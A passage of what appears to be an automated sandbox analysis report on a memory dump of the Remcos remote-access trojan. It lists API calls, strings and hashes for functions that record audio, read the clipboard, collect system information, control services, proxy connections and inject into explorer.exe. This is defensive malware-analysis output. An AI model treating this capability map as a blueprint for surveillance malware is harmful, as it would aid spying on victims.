                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                        • TranslateMessage.USER32(?), ref: 0040557E
                                        • DispatchMessageA.USER32(?), ref: 00405589
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 2956720200-749203953
                                        • Opcode ID: 64fc086ea25693d4c9e74b4bdb7fb32219071ce4127b145092e87943638d2e0e
                                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                        • Opcode Fuzzy Hash: 64fc086ea25693d4c9e74b4bdb7fb32219071ce4127b145092e87943638d2e0e
                                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                        Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                        • String ID: 0VG$0VG$<$@$Temp
                                        • API String ID: 1704390241-2575729100
                                        • Opcode ID: 6f6b6ebf27fedb738aceabdcac13e206b780a78d8e5b152ac6f35e1b1749394a
                                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                        • Opcode Fuzzy Hash: 6f6b6ebf27fedb738aceabdcac13e206b780a78d8e5b152ac6f35e1b1749394a
                                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                        Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32 ref: 00416941
                                        • EmptyClipboard.USER32 ref: 0041694F
                                        • CloseClipboard.USER32 ref: 00416955
                                        • OpenClipboard.USER32 ref: 0041695C
                                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                        • CloseClipboard.USER32 ref: 00416984
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                        • String ID: !D@
                                        • API String ID: 2172192267-604454484
                                        • Opcode ID: 09e40c178438f861953ad73b4319b12bb04aeac0026907326ee2fa957add1598
                                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                        • Opcode Fuzzy Hash: 09e40c178438f861953ad73b4319b12bb04aeac0026907326ee2fa957add1598
                                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                        Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                        • CloseHandle.KERNEL32(?), ref: 00413465
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                        • String ID:
                                        • API String ID: 297527592-0
                                        • Opcode ID: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                        • Opcode Fuzzy Hash: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                        Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                        • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                        Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00448135
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00448141
                                        • _free.LIBCMT ref: 0044814C
                                        • _free.LIBCMT ref: 00448157
                                        • _free.LIBCMT ref: 00448162
                                        • _free.LIBCMT ref: 0044816D
                                        • _free.LIBCMT ref: 00448178
                                        • _free.LIBCMT ref: 00448183
                                        • _free.LIBCMT ref: 0044818E
                                        • _free.LIBCMT ref: 0044819C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                        Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Eventinet_ntoa
                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                        • API String ID: 3578746661-3604713145
                                        • Opcode ID: 62c1f3fe3af975eef78232181f6e592caace1332abd3bb8fd32521eabcae62ef
                                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                        • Opcode Fuzzy Hash: 62c1f3fe3af975eef78232181f6e592caace1332abd3bb8fd32521eabcae62ef
                                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                        Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DecodePointer
                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                        • API String ID: 3527080286-3064271455
                                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                        Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                        • Sleep.KERNEL32(00000064), ref: 00417521
                                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CreateDeleteExecuteShellSleep
                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                        • API String ID: 1462127192-2001430897
                                        • Opcode ID: 1573face9f48aa7ca9f90e6055c45cba110577aa5dfdbe0b4be733a29c62012b
                                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                        • Opcode Fuzzy Hash: 1573face9f48aa7ca9f90e6055c45cba110577aa5dfdbe0b4be733a29c62012b
                                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                        Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040749E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentProcess
                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                        • API String ID: 2050909247-4242073005
                                        • Opcode ID: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
                                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                        • Opcode Fuzzy Hash: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
                                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                        Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strftime.LIBCMT ref: 00401D50
                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                        • API String ID: 3809562944-243156785
                                        • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                        • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                        Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                        • int.LIBCPMT ref: 00410E81
                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                        • String ID: ,kG$0kG
                                        • API String ID: 3815856325-2015055088
                                        • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                        • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                        Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                        • waveInStart.WINMM ref: 00401CFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                        • String ID: dMG$|MG$PG
                                        • API String ID: 1356121797-532278878
                                        • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                        • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                        Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                          • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                          • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                        • TranslateMessage.USER32(?), ref: 0041D4E9
                                        • DispatchMessageA.USER32(?), ref: 0041D4F3
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                        • String ID: Remcos
                                        • API String ID: 1970332568-165870891
                                        • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                        • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                        • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                        • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                        Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                        • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                        • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                        • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                        Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • _memcmp.LIBVCRUNTIME ref: 00445423
                                        • _free.LIBCMT ref: 00445494
                                        • _free.LIBCMT ref: 004454AD
                                        • _free.LIBCMT ref: 004454DF
                                        • _free.LIBCMT ref: 004454E8
                                        • _free.LIBCMT ref: 004454F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorLast$_abort_memcmp
                                        • String ID: C
                                        • API String ID: 1679612858-1037565863
                                        • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                        • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                        • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                        • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                        Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: tcp$udp
                                        • API String ID: 0-3725065008
                                        • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                        • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                        • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                        • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                        Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                        • ExitThread.KERNEL32 ref: 004018F6
                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                        • String ID: PkG$XMG$NG$NG
                                        • API String ID: 1649129571-3151166067
                                        • Opcode ID: 50019b23594c7f8594175c599cdc70c6a85fa80541799c81a7c64c19a659782b
                                        • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                        • Opcode Fuzzy Hash: 50019b23594c7f8594175c599cdc70c6a85fa80541799c81a7c64c19a659782b
                                        • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                        Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                        • String ID: .part
                                        • API String ID: 1303771098-3499674018
                                        • Opcode ID: d529a156e2d4aa638270efb6cac6cc48bb231fa92e7fccec4ec34662e1436a09
                                        • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                        • Opcode Fuzzy Hash: d529a156e2d4aa638270efb6cac6cc48bb231fa92e7fccec4ec34662e1436a09
                                        • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                        Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                        • __freea.LIBCMT ref: 0044AE30
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        • __freea.LIBCMT ref: 0044AE39
                                        • __freea.LIBCMT ref: 0044AE5E
                                        Memory Dump Source
